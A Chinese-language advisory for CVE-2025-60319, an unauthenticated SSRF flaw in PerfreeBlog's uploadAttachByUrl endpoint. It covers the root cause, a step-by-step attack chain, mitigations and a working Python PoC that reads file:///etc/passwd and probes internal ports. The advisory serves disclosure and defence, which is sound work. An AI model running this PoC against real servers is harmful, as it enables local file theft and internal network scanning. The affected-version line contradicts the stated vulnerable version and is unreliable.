CVE-2025-60319 PerfreeBlog v4.0.11 uploadAttachByUrl接口SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-60319

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PerfreeBlog

漏洞概述

CVE-2025-60319是PerfreeBlog v4.0.11版本中的一个服务器端请求伪造（SSRF）漏洞。该漏洞存在于AttachController.java文件中的uploadAttachByUrl API端点，由于该接口缺少适当的授权检查，攻击者可以在无需认证的情况下利用此漏洞。攻击者可以通过构造恶意URL，诱导服务器向内部网络资源或外部恶意服务器发起请求，从而实现端口扫描、内网服务探测、读取本地文件或绕过防火墙限制等攻击。此漏洞的CVSS评分为6.5，属于中等严重程度，攻击复杂度低且无需用户交互，攻击者可通过网络直接利用此漏洞。

技术细节

该漏洞的根本原因在于PerfreeBlog的uploadAttachByUrl接口未对用户提交的URL参数进行严格的验证和过滤。攻击者可以向该接口发送包含恶意URL的请求，服务器在处理请求时会直接访问该URL，从而导致服务器发起请求伪造。攻击者可以利用此漏洞进行以下操作：1）端口扫描：探测内网服务的开放状态；2）读取本地文件：通过file://协议读取服务器本地文件；3）内网服务探测：访问内网的Web服务、数据库等；4）绕过防火墙：通过服务器作为跳板访问受保护的资源。漏洞存在于AttachController.java的uploadAttachByUrl方法中，该方法接收URL参数后直接使用Java的网络API发起请求，未进行来源验证或URL白名单限制。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用PerfreeBlog v4.0.11版本，确定uploadAttachByUrl API端点存在

STEP 2

步骤2: 构造恶意请求

攻击者构造包含恶意URL的POST请求，URL指向内网资源或本地文件

STEP 3

步骤3: 发送SSRF请求

攻击者向/admin/attach/uploadAttachByUrl端点发送构造的请求，无需认证

STEP 4

步骤4: 服务器发起伪造请求

服务器接收到请求后，使用Java网络API访问攻击者指定的URL

STEP 5

步骤5: 获取敏感信息

攻击者通过响应获取内网服务信息、本地文件内容或探测端口开放状态

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-60319 PoC - PerfreeBlog SSRF via uploadAttachByUrl
# Target: PerfreeBlog v4.0.11

TARGET_URL = "http://target.com"  # Replace with target URL

def exploit_ssrf(target_url, payload_url):
    """
    Exploit SSRF vulnerability in uploadAttachByUrl endpoint
    """
    endpoint = f"{target_url}/admin/attach/uploadAttachByUrl"
    
    # Payload to exploit SSRF
    data = {
        "url": payload_url  # Malicious URL (e.g., file:///etc/passwd or http://127.0.0.1:port)
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        return response
    except Exception as e:
        print(f"[!] Error: {e}")
        return None

def scan_internal_port(target_url, host, port):
    """
    Scan internal ports via SSRF
    """
    payload = f"http://{host}:{port}"
    print(f"[*] Scanning {host}:{port}...")
    exploit_ssrf(target_url, payload)

if __name__ == "__main__":
    # Example: Read local file
    print("[*] CVE-2025-60319 - PerfreeBlog SSRF PoC")
    print("[*] Exploiting uploadAttachByUrl endpoint...")
    
    # Read local file
    exploit_ssrf(TARGET_URL, "file:///etc/passwd")
    
    # Scan internal localhost
    # scan_internal_port(TARGET_URL, "127.0.0.1", 3306)

影响范围

PerfreeBlog < 4.0.11

防御指南

临时缓解措施

在官方修复版本发布之前，可通过以下措施临时缓解：1）在Web应用层添加URL过滤规则，阻止对内网IP、localhost和file://协议的访问；2）限制该API端点的访问权限，确保需要认证才能调用；3）在网络层配置防火墙规则，限制服务器对外发起请求的范围；4）定期监控访问日志，及时发现异常的SSRF攻击行为。建议尽快升级到官方发布的安全版本。